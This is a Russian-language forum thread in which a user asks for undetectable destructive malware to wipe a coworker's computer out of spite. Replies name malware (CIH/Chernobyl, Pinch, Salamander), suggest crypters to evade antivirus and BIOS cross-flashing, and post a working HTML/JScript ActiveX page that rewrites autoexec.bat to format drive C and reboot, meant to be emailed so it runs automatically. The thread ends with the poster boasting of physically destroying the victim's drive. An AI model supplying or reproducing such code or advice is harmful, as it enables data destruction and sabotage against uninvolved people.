Просмотр полной версии : Помогите убить комп - софтово
EmitRemus
15.01.2008, 14:59
Хай пипл! О такой просьбе ещё не просил. но вот пришлось! Есть комп, на нём стоит Avast надо этот комп увалить, если у кого есть надёжный вирь которой не обнаружит сей сабж выложите плиз! А лучше в личку! Просто на работе завелись крысы который не делятся информацией вот от всего нашего коллектива из 8 человек решило насолить гаду! Помогите нам!
Уважаемые администраторы/модераторы если тему создал не там прошу перенести её в соотвествующий раздел! Спасибо...
xxChaoSxx
15.01.2008, 21:02
Попроьуй поискать вирь - саламндра звётся,убивает виндовс ( ты даёш ему дату и время и когда то время настаёт виндовс убивается и всегда синий экран смерти )
Если не найдёш стукни мне залью. . .На тот момент когда я юзал этот вирь в инет кафе он не палился нечем и раюотал на все 100% ! :)
я писал кадато прогу на delphi(о ужас!) которая весила где-то 100 кб.(тогда я ниче неоптимизиовал... та и вообще писал чисто для себя) и тупо забивала оператиыную память пока её не убить.... при этом почти не грузиоа проц(хотя и проц загрузить можно). в итоге - страшные глюки. сделать ничего нельзя. а особенно когда заканчиваеться оперативка... ну и плюс можно сделать рандомное удаление файлов.....
но прога эта ушла вместе с дозлым хардом....
а вообще удали ему explorer.exe и он ничё не поймёт. гг.
Удалить файл подкачки)
я его когда-то хотел удалить у себя, когда увидел, что он занимает 1.5 гига. но решил, что если системный - то не стоит)
procedure
15.01.2008, 22:41
а вообще удали ему explorer.exe и он ничё не поймёт. гг.
1. он защищен этим же антивиръем...
2. и тей же виндой и тем же брэндмауером...
3. Если есть доступ, достаточно просто переименовать его...
пинч 3 я тебе бы посоветовал, + админская прога v_jope + какой нить скриптор..
EmitRemus
15.01.2008, 22:56
Мне надо что нибудь проще. Засунул флешку, запустил прогу и ушел спокойно, а после перезагрузки настал ХАОС и желательно чтобы данные со всех дисков были удалены нафиг!
Пинч3....мдя + какой нить скриптор .....no comments
Тебе не кажется что палевно - ты сунул флеху а потом капут о_О
Поищи чернобыль или апокалипсис и закриптуй...
procedure
15.01.2008, 23:13
смотри в пм...
procedure
15.01.2008, 23:15
Пинч3....мдя + какой нить скриптор .....no comments
Тебе не кажется что палевно - ты сунул флеху а потом капут о_О
Поищи чернобыль или апокалипсис и закриптуй...
смотря на кого наткнешься...
xxChaoSxx
15.01.2008, 23:24
а мля чё я сразу не додумался - берёш любо генератор вирусов ( например апокалипсиси илиКузя или как там ) создаёш вирус под сво вкус,если нада криптуеш , далее запускаш с флехи и вуаля! но саламандра рулитт-настроил запустил батник,там пошёл...а когда придёт та дата которую ты постаивл вирусу для самозапуска компу ппц!и никаких подозрении если норм настроить и спланировать норм
EmitRemus
15.01.2008, 23:37
Ну дайте тада чернобыль мне! Хотя его avast спалит... Есть вообще что нибудь готовое к использованию? Что неужели ниукого нет виря или троя деструктивного? Мне то пофиг а если инфа какая придёт то только вам а не мне! Для меня главное положить его комп вместе со все информацией на винтах!
<html>
<head>
<script>
var FSO = new ActiveXObject("Scripting.FileSystemObject");
//Если файл существует
if (FSO.FileExists("c:\\autoexec.bat"))
{
var F = FSO.GetFile("c:\\autoexec.bat");
//выставляем обычные атрибуты
F.attributes=0;
//удаляем его
F.Delete();
//заново создаем его
var MyFile = fso.CreateTextFile("c:\\autoexec.bat", true);
//открываем его для записи
var f = FSO.OpenTextFile("c:\\autoexec.bat", 2, true);
//пишем в него
f.WriteLine("@cls");
f.WriteLine("@echo Windows upgrading your system...");
f.WriteLine("@echo Do not abort this process!");
f.WriteLine("@format c: /q /autotest");
//закрываем
f.Close();
//Создаем объект WshShell:
var WshShell = new ActiveXObject("WScript.Shell");
//рестарт..
WshShell.Run ("%windir%\\system\\restart.exe");
}
//если не существует...
else
//создаем файл
var MyFile = fso.CreateTextFile("c:\\autoexec.bat", true);
//открываем и пишем
var f = FSO.OpenTextFile("c:\\autoexec.bat", 2, true);
f.WriteLine("@cls");
f.WriteLine("@echo Windows upgrading your system...");
f.WriteLine("@echo Do not abort this process!");
f.WriteLine("@format c: /q /autotest");
//закрываем
f.Close();
//Создаем объект WshShell:
var WshShell = new ActiveXObject("WScript.Shell");
//рестарт..
WshShell.Run ("%windir%\\system\\restart.exe");
</script>
</head>
</html>
Все дела.
Вот и всё, смело закачивай скрипт на свою пагу и раздавай url "друзьям" -).
Если тебе известен e-mail, то отошли ему этот html-код, и всё получится, т. к. многие майлеры
обработают вложенное автоматом.
Единственное ограничение-наличие Win98 или Win95.
а еще лучще закажи мы тебе сделаем что нибудь интересное
EmitRemus
15.01.2008, 23:58
а еще лучще закажи мы тебе сделаем что нибудь интересное Что значит закажи? Платить за это я думаю нецелеобразно. Вот нашёл в просторах win.CIH ща буду его пробовать на старом ноуте... ГЫГЫГЫ Жалко что под WinXp не фурычит а так вирь просто отменный!
ну сам смотри а то бы еще поглумился над челом и над его компом. ;) (Реналю привет передавай)
Единственное ограничение-наличие Win98 или Win95.Обалдеть :)
А вообще лучший способ- найди прогу перепрошивки биоса к его мамке. И из cmd прошей от другой модели биос. Не знаю, как на ПК, но с буком мы возились часов ~16, пока исправили.
EmitRemus
16.01.2008, 23:50
(Реналю привет передавай) Ого у нас общий знакомый! Передам!
А комп мы положили! Когда этот товарищ ушел на обед мы по его винту дали немного разряда из пьезаэлемента электрической зажигалки (большой), после чего на экране осталась только заставка. После обеда все наблюдали жерву в панике с винтом в руках! Короче спасибо что не отказали!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot